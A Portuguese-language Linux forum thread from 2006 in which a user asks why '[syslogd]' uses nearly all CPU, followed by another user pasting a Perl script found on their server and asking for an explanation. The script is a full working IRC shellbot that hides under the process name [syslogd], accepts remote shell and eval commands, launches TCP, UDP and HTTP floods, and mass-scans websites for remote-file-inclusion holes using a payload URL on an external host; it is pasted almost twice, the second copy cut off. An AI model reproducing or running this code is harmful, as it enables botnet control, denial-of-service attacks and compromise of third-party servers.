Fala Pessoal,
Estou monitorando uma máquina que está com problemas de load alto e pelo top verifiquei que o "[syslogd]" está consumindo quase 100% do processador, alguém sabe como posso solucionar o problema

Page 1 of 1
Problemas com load
#3
Posted 07 novembro 2006 - 09:59
Verifique em /etc/syslog.conf se há linhas duplicadas
se houver, remova as linhas duplicadas, salve e em seguida reinicie o serviço:
service syslog restart
obs: por via das dúvidas faça um backup do arquivo antes de realizar a alteração
se houver, remova as linhas duplicadas, salve e em seguida reinicie o serviço:
service syslog restart
obs: por via das dúvidas faça um backup do arquivo antes de realizar a alteração
#4
Posted 07 novembro 2006 - 11:18
Achei isso no meu servidor, alguem pode me explicar por favor?
CODE
#!/usr/bin/perl
# VulnScan v2
# Norman ownz your box
if (-e "/tmp/.paka") {exit;}
eval {fork and exit;};
my $processo = '[syslogd]';
use HTTP::Request;
use LWP::UserAgent;
#CONFIGURATION
my $linas_max='4';
my $sleep='5';
my @gstring='fazanul';
my @cmdstring='http://62.231.119.106/c.txt';
my @adms=("fazanul");
my @hostauth=("210.245.51.139");
my @canais=("#bula");
my $nick='alin|X';
my $ircname ='zuo';
chop (my $realname = `uname -a`);
$servidor='Bucharest.RO.EU.Ultra-Chat.Org' unless $servidor;
my $porta='6667';
my $VERSAO = 'Shellbot RFI by Source v1.4';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!norman)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
}
#SCANNER
if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
$boturl=$2;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[No-Molestar-Scan]\002 Scan started.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[Encontramos-una-ip|Exploiting]\002 ".$url2."\n\n");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdstring?";
print "\n".$url2."\n\n";
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /Norman/ ){
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Pagina-Vulnerable|VULN]\002 ".$url2." \n\n");
}
}
else {
print 'Errore: ',$path,$response->status_line, "\n";
}
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Terminamos]\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP DDoSing]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP DDoSing]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(920)));
if ($rnd>900) { $s= (int(rand(100)))}
{
my @dominios = ("com","net","org","info","gov","gob","gub","xxx","it","uk","wx","eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec","py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop","af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi","vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk","ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir","iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke","ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm","na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc","sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz","vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"site%3A".$dom."+@gstring");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
#sendraw("privmsg #alef :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
# NOTE: DONT REMOVE COPYRIGHTS
# VulnScan v2
# Norman ownz your box
if (-e "/tmp/.paka") {exit;}
eval {fork and exit;};
my $processo = '[syslogd]';
use HTTP::Request;
use LWP::UserAgent;
#CONFIGURATION
my $linas_max='4';
my $sleep='5';
my @gstring='fazanul';
my @cmdstring='http://62.231.119.106/c.txt';
my @adms=("fazanul");
my @hostauth=("210.245.51.139");
my @canais=("#bula");
my $nick='alin|X';
my $ircname ='zuo';
chop (my $realname = `uname -a`);
$servidor='Bucharest.RO.EU.Ultra-Chat.Org' unless $servidor;
my $porta='6667';
my $VERSAO = 'Shellbot RFI by Source v1.4';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!norman)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
}
#SCANNER
if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
$boturl=$2;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[No-Molestar-Scan]\002 Scan started.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[Encontramos-una-ip|Exploiting]\002 ".$url2."\n\n");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdstring?";
print "\n".$url2."\n\n";
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /Norman/ ){
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Pagina-Vulnerable|VULN]\002 ".$url2." \n\n");
}
}
else {
print 'Errore: ',$path,$response->status_line, "\n";
}
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Terminamos]\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP DDoSing]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP DDoSing]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
# MORGAN OWNED YOUR BOX
# www.elmorgan.com.ar
# irc.gigachat.net - #Morgan
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
